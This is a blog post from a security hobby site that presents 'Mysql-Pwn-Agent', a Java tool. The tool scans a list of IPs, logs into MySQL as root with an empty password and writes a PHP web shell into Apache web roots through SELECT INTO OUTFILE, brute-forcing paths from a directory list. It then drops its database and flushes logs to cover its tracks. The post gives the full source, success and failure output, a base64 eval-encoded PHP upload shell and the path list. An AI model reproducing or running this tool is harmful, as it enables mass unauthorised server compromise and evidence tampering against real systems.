Comments

Saturday, February 9, 2013

Mysql-Pwn-Agent Beta

Posted by at Saturday, February 09, 2013 Read our previous post

 

Hello and Good morning to all readers. I get up quite early today and in fact I slept very late last night. argh..

But im done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is a Mysql + Any Win Http Server Auto Exploite,i use (XAMPP) for testings.

Here is my simple Poc=Proof of Concept

.           Paint wtf Zwinkerndes Smiley

 

Unbenannt

 

After some days playing with java jdbc and Xampp Mysql and Apache.

I finished writing the exploit thanks to Yeohwa for some hints.

Here some Screenshots.

We need some Test-Server Start Xampp + Apache Web Server + Mysql Database

 

xampp

 

Get the Exploit and add some IP´s to scan.txt.Add your php shell code base64 encode to shell.txt Start the Exploit.You can use php/reverse/metapreter/ from metasploit to get some reverse shell but it suckz on my online check shell class because phpmetasploit reverse shell never stop loading.Better use any php-shell  or my simple upload script.

 

input

The POC-Exploit:

 

exploit

 

Exploit Output if she fail.Creating Random Database+Tables all the time.She use dir.txt to brute the htdocs root dir from Apache to upload the shell and check if shell online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit Output if she WIN.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now she find the root doc and we WIN and got your shells ready Zwinkerndes Smiley



Look into results.txt there are the saved shells.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################


The Result with base64 encode Upload Script :



uploadscript



YeahhhHhhh we got a upload script to upload your shell.Nothing new … Zwinkerndes Smiley



Have pfun



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt




eval(base64_decode("ZnVuY3Rpb24gZGlzcGxheV91cGxvYWRfZm9ybSgpDQp7DQplY2hvIDw8PERJU1BMQVlfVVBMT0FEX0ZPUk0NCg0KICAgIDxodG1sPg0KICAgIDxoZWFkPg0KICAgIDx0aXRsZT5VcGxvYWQgU2hlbGwgYnkgU2VjdXJpdHktaXMtanVzdC1hbi1pbGx1c2lvbi5ibG9nc3BvdC5kZTwvdGl0bGU+DQogICAgPHN0eWxlIHR5cGU9InRleHQvY3NzIiBtZWRpYT0ic2NyZWVuIj4NCiAgICAgICAgPCEtLQ0KICAgICAgICBodG1sIGJvZHkNCiAgICAgICAge2JhY2tncm91bmQ6IzE0RkYwMDsgZm9udDogNzYlLzEuNWVtIGFyaWFsLCBoZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGNvbG9yOiNGRjAwMzA7fQ0KICAgICAgIDxib2R5IGJnY29sb3IgPSAiYmxhY2siPg0KICAgICAgICBpbnB1dA0KICAgICAgICB7Y29sb3I6I0ZGMDAzMDt9DQogICAgICAgIC0tPg0KICAgIDwvc3R5bGU+DQogICAgPC9oZWFkPg0KICAgIA0KICAgIDxib2R5Pg0KDQogICAgPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249InskX1NFUlZFUlsnUEhQX1NFTEYnXX0iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPg0KICAgIA0KICAgIDxwPkZpbGUgVXBsb2FkIGJ5ICAgKmNyNHNoeXkqICAgZnJvbSA8YSBocmVmPSJodHRwOi8vd3d3LlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGUiPlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGU8L2E+IDxiciAvPg0KICAgIDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJteWZpbGUiIHRhYmluZGV4PSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQgRmlsZSIgdGFiaW5kZXg9IjIiIC8+DQoNCiAgICA8L2Zvcm0+DQoNCiAgICA8L2JvZHk+DQogICAgPC9odG1sPg0KDQpESVNQTEFZX1VQTE9BRF9GT1JNOw0KDQp9DQoNCi8vIEZpbGUgVXBsb2FkICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCg0KZnVuY3Rpb24gZXhlY3V0ZV91cGxvYWQoKQ0Kew0KDQogICAgLy8gcm9vdCBwYXRoDQogICAgJHBhdGggPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOw0KDQogICAgLy8gdXBsb2FkIGRpcmVjdG9yeS4gcGF0aCB3aWxsIG9yaWdpbmF0ZSBmcm9tIHJvb3QuDQogICAgJGRpcm5hbWUgPSAnLyc7DQoNCiAgICAvLyBwZXJtaXNzaW9uIHNldHRpbmdzIGZvciBuZXdseSBjcmVhdGVkIGZvbGRlcnMNCiAgICAkY2htb2QgPSAwNzU1Ow0KDQogICAgLy8gY3JlYXRlIGZpbGUgdmFycyB0byBtYWtlIHRoaW5ncyBlYXNpZXIgdG8gcmVhZC4NCiAgICAkZmlsZW5hbWUgPSAkX0ZJTEVTWydteWZpbGUnXVsnbmFtZSddOw0KICAgICRmaWxlc2l6ZSA9ICRfRklMRVNbJ215ZmlsZSddWydzaXplJ107DQogICAgJGZpbGV0eXBlID0gJF9GSUxFU1snbXlmaWxlJ11bJ3R5cGUnXTsNCiAgICAkZmlsZV90bXAgPSAkX0ZJTEVTWydteWZpbGUnXVsndG1wX25hbWUnXTsNCiAgICAkZmlsZV9lcnIgPSAkX0ZJTEVTWydteWZpbGUnXVsnZXJyb3InXTsNCiAgICAkZmlsZV9leHQgPSBzdHJyY2hyKCRmaWxlbmFtZSwgJy4nKTsNCg0KICAgIC8vIGNoZWNrIGlmIHVzZXIgYWN0dWFsbHkgcHV0IHNvbWV0aGluZyBpbiB0aGUgZmlsZSBpbnB1dCBmaWVsZC4NCiAgICBpZiAoKCRmaWxlX2VyciA9PSAwKSAmJiAoJGZpbGVzaXplICE9IDApKQ0KICAgIHsNCiAgICAgICAgLy8gQ2hlY2sgZXh0ZW5zaW9uLg0KICAgICAgICBpZiAoISRmaWxlX2V4dCkNCiAgICAgICAgew0KICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICBkaWUoJ0ZpbGUgbXVzdCBoYXZlIGFuIGV4dGVuc2lvbi4nKTsNCiAgICAgICAgfQ0KDQogICAgICAgIC8vIGV4dHJhIGNoZWNrIHRvIHByZXZlbnQgZmlsZSBhdHRhY2tzLg0KICAgICAgICBpZiAoaXNfdXBsb2FkZWRfZmlsZSgkZmlsZV90bXApKQ0KICAgICAgICB7DQogICAgICAgICAgICAvKg0KICAgICAgICAgICAgKiBjaGVjayBpZiB0aGUgZGlyZWN0b3J5IGV4aXN0cw0KICAgICAgICAgICAgKiBpZiBpdCBkb2VzbnQgZXhpc3QsIG1ha2UgdGhlIGRpcmVjdG9yeQ0KICAgICAgICAgICAgKi8NCiAgICAgICAgICAgICRkaXIgPSAkcGF0aCAuICRkaXJuYW1lOw0KDQogICAgICAgICAgICBpZiAoIWlzX2RpcigkZGlyKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkZGlyID0gZXhwbG9kZSgnLycsICRkaXJuYW1lKTsNCg0KICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRkaXIgYXMgJHN1Yl9kaXIpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAkcGF0aCAuPSAnLycgLiAkc3ViX2RpcjsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFpc19kaXIoJHBhdGgpKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICBpZiAoIW1rZGlyKCRwYXRoLCAkY2htb2QpKQ0KICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRpZSgnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gRGlyZWN0b3J5IGRvZXMgbm90IGV4aXN0IGFuZCB3YXMgdW5hYmxlIHRvIGJlIGNyZWF0ZWQuJyk7DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQoNCiAgICAgICAgICAgIC8qDQogICAgICAgICAgICAqIGNvcHkgdGhlIGZpbGUgZnJvbSB0aGUgdGVtcG9yYXJ5IHVwbG9hZCBkaXJlY3RvcnkNCiAgICAgICAgICAgICogdG8gaXRzIGZpbmFsIGRldGluYXRpb24uDQogICAgICAgICAgICAqLw0KICAgICAgICAgICAgaWYgKEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVfdG1wLCAkZGlyIC4gJy8nIC4gJGZpbGVuYW1lKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAvLyBzdWNjZXNzIQ0KICAgICAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgICAgIDxwPlN1Y2Nlc3MhPC9wPg0KICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+VmlldyBGaWxlOjwvc3Ryb25nPiA8YSBocmVmPSBcIi8kZmlsZW5hbWVcIj4kZmlsZW5hbWU8L2E+PC9wPg0KICAgICAgICAgICAgICAgICI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgLy8gZXJyb3IgbW92aW5nIGZpbGUuIGNoZWNrIGZpbGUgcGVybWlzc2lvbnMuDQogICAgICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICAgICAgZWNobyAnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gVW5hYmxlIHRvIG1vdmUgZmlsZSB0byBkZXNpZ25hdGVkIGRpcmVjdG9yeS4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIGVsc2UNCiAgICAgICAgew0KICAgICAgICAgICAgLy8gZmlsZSBzZWVtcyBzdXNwaWNpb3VzLi4uIGRlbGV0ZSBmaWxlIGFuZCBlcnJvciBvdXQuDQogICAgICAgICAgICB1bmxpbmsoJGZpbGVfdG1wKTsNCiAgICAgICAgICAgIGVjaG8gJzxzdHJvbmc+RXJyb3I6PC9zdHJvbmc+IEZpbGUgZG9lcyBub3QgYXBwZWFyIHRvIGJlIGEgdmFsaWQgdXBsb2FkLiBDb3VsZCBiZSBhIGZpbGUgYXR0YWNrLic7DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZQ0KICAgIHsNCiAgICAgICAgLy8gS2lsbCB0ZW1wIGZpbGUsIGlmIGFueSwgYW5kIGRpc3BsYXkgZXJyb3IuDQogICAgICAgIGlmICgkZmlsZV90bXAgIT0gJycpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICB9DQoNCiAgICAgICAgc3dpdGNoICgkZmlsZV9lcnIpDQogICAgICAgIHsNCiAgICAgICAgICAgIGNhc2UgJzAnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1RoYXQgaXMgbm90IGEgdmFsaWQgZmlsZS4gMCBieXRlIGxlbmd0aC4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcxJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUsIGF0ICcgLiAkZmlsZXNpemUgLiAnIGJ5dGVzLCBleGNlZWRzIHRoZSBtYXhpbXVtIGFsbG93ZWQgZmlsZSBzaXplIGFzIHNldCBpbiA8ZW0+cGhwLmluaTwvZW0+LiAnLg0KICAgICAgICAgICAgICAgICdQbGVhc2UgY29udGFjdCB5b3VyIHN5c3RlbSBhZG1pbi4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcyJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUgZXhjZWVkcyB0aGUgbWF4aW11bSBmaWxlIHNpemUgc3BlY2lmaWVkIGluIHlvdXIgSFRNTCBmb3JtLic7DQogICAgICAgICAgICAgICAgYnJlYWs7DQoNCiAgICAgICAgICAgIGNhc2UgJzMnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ0ZpbGUgd2FzIG9ubHkgcGFydGlhbGx5IHVwbG9hZGVkLiBUaGlzIGNvdWxkIGJlIHRoZSByZXN1bHQgb2YgeW91ciBjb25uZWN0aW9uICcuDQogICAgICAgICAgICAgICAgJ2JlaW5nIGRyb3BwZWQgaW4gdGhlIG1pZGRsZSBvZiB0aGUgdXBsb2FkLic7DQoNCiAgICAgICAgICAgIGNhc2UgJzQnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1lvdSBkaWQgbm90IHVwbG9hZCBhbnl0aGluZy4uLiBQbGVhc2UgZ28gYmFjayBhbmQgc2VsZWN0IGEgZmlsZSB0byB1cGxvYWQuJzsNCiAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgfQ0KICAgIH0NCn0NCg0KLy8gTG9naWMgQ29kZSAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KDQppZiAoaXNzZXQoJF9QT1NUWydleGVjdXRlJ10pKQ0Kew0KICAgIGV4ZWN1dGVfdXBsb2FkKCk7DQp9DQplbHNlDQp7DQogICAgZGlzcGxheV91cGxvYWRfZm9ybSgpOw0KfQ==")); 



dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for Personal use or study purposes.

No comments:

Post a Comment

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template